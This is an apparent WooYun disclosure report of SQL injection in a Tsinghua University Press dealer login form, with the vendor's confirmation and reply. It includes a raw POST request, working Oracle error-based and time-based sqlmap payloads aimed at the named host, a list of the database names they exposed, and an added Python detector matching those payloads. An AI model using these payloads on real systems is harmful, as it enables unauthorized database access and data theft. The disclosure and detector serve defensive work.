
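Vulnerability Summary

Bug ID: wooyun-2015-0112868

Title: SQL injection in a Tsinghua University system

Vendor: Tsinghua University

Author: 深度安全实验室

Submitted: 2015-05-08 15:29

Fixed: 2015-06-25 10:08

Disclosed: 2015-06-25 10:08

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 20

Status: Confirmed by vendor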

Source: http://www.wooyun.org. For questions or help, contact [email protected]



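Vulnerability Details

Disclosure status:

2015-05-08: Details reported to the vendor; awaiting vendor response
2015-05-11: Vendor confirmed; details disclosed to the vendor only
2015-05-21: Details disclosed to core white hats and experts in related fields
2015-05-31: Details disclosed to regular white hats
2015-06-10: Details disclosed to intern white hats
2015-06-25: Details disclosed to the public

Brief description:

Welcome Tsinghua University to the WooYun family

Detailed description:

Proof of vulnerability:

1. Tsinghua University Press dealer service system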

http://dealer.tup.tsinghua.edu.cn/


2. The login form is vulnerable to SQL injection; specifically, the UNO parameter is at fault

POST /login.asp HTTP/1.1
Host: dealer.tup.tsinghua.edu.cn
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:33.0) Gecko/20100101 Firefox/33.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://dealer.tup.tsinghua.edu.cn/
Cookie: safedog-flow-item=D961C6F6956C1C8A4C58645CF414C7F2; ASPSESSIONIDSCARBCCQ=CKHFGPPBDCKFIABCDLAEOFBN
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 30

UNO=a&Password=a&Submit=++++++


3. Run sqlmap to confirm the injection exists



4. Databases:

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: POST
Parameter: UNO
Type: error-based
Title: Oracle AND error-based - WHERE or HAVING clause (UTL_INADDR.GET_HOST_ADDRESS)
Payload: UNO=a' AND 1575=UTL_INADDR.GET_HOST_ADDRESS(CHR(113)||CHR(111)||CHR(119)||CHR(100)||CHR(113)||(SELECT (CASE WHEN (1575=1575) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(97)||CHR(106)||CHR(100)||CHR(113)) AND 'aSTw'='aSTw&Password=a&Submit=
Type: AND/OR time-based blind
Title: Oracle AND time-based blind
Payload: UNO=a' AND 4615=DBMS_PIPE.RECEIVE_MESSAGE(CHR(83)||CHR(107)||CHR(84)||CHR(85),5) AND 'wFUV'='wFUV&Password=a&Submit=
---
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP
back-end DBMS: Oracle
available databases [21]:
[*] AURORA$JIS$UTILITY$
[*] CB
[*] CDZ_CBS
[*] CTXSYS
[*] CW
[*] DEMO
[*] ERP
[*] FX
[*] FXOLD
[*] LAB
[*] MDSYS
[*] MTSSYS
[*] ORDSYS
[*] OSE$HTTP$ADMIN
[*] OUTLN
[*] QHCBS
[*] SCOTT
[*] SYS
[*] SYSTEM
[*] TOAD
[*] ZJSD1
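
A defender-side check built from the sqlmap output above (an added example, not part of the original report): it scans form-encoded POST bodies for the Oracle built-ins and quoting patterns seen in the UNO payloads. The function and pattern names are this example's own, and it assumes request bodies are available to it, for instance from proxy or application logging.

```python
import re
from urllib.parse import parse_qsl, quote_plus

# Oracle built-ins used by the sqlmap payloads above; a login field has no
# legitimate reason to contain them. Pattern names are this example's own.
ORACLE_SQLI_PATTERNS = {
    "error-based (UTL_INADDR)": re.compile(r"UTL_INADDR\s*\.\s*GET_HOST_(ADDRESS|NAME)", re.I),
    "time-based (DBMS_PIPE)": re.compile(r"DBMS_PIPE\s*\.\s*RECEIVE_MESSAGE", re.I),
    "CHR() concatenation chain": re.compile(r"(CHR\s*\(\s*\d+\s*\)\s*\|\|\s*){2,}", re.I),
    "quote then AND/OR": re.compile(r"'\s+(AND|OR)\s", re.I),
}

def scan_form_body(body):
    """Return {parameter: [reasons]} for every suspicious form field."""
    findings = {}
    # parse_qsl URL-decodes each value, so %27 / '+' encodings cannot hide a match.
    for name, value in parse_qsl(body, keep_blank_values=True):
        reasons = [r for r, p in ORACLE_SQLI_PATTERNS.items() if p.search(value)]
        if reasons:
            findings.setdefault(name, []).extend(reasons)
    return findings

# Sample bodies: the benign login from the report, the two payload shapes
# sqlmap reported (first CHR chain shortened), and a URL-encoded variant
# (constructed for this example).
BENIGN = "UNO=a&Password=a&Submit=++++++"
ERROR_BASED = ("UNO=a' AND 1575=UTL_INADDR.GET_HOST_ADDRESS(CHR(113)||CHR(111)||"
               "CHR(119)) AND 'aSTw'='aSTw&Password=a&Submit=")
TIME_BASED = ("UNO=a' AND 4615=DBMS_PIPE.RECEIVE_MESSAGE(CHR(83)||CHR(107)||"
              "CHR(84)||CHR(85),5) AND 'wFUV'='wFUV&Password=a&Submit=")
ENCODED = "UNO=" + quote_plus("a' and 1=utl_inaddr.get_host_name('x')") + "&Password=a"

if __name__ == "__main__":
    for label, body in [("benign", BENIGN), ("error-based", ERROR_BASED),
                        ("time-based", TIME_BASED), ("encoded", ENCODED)]:
        print(f"{label:12} {scan_form_body(body) or 'clean'}")
```

Pattern matching of this kind is a tripwire for logs or a WAF rule; the fix for the flaw itself is to pass UNO to Oracle as a bind variable rather than concatenating it into the query.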


Tables in the CDZ_CBS database:

Database: CDZ_CBS
[477 tables]


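Remediation:

Copyright notice: please credit the source when reposting: 深度安全实验室@乌云


Vulnerability Response

Vendor response:

Severity: Low

Vulnerability Rank: 5

Confirmed: 2015-05-11 10:06

Vendor reply:

Thank you for the notice; we will fix this vulnerability as soon as possible.

Latest status:

None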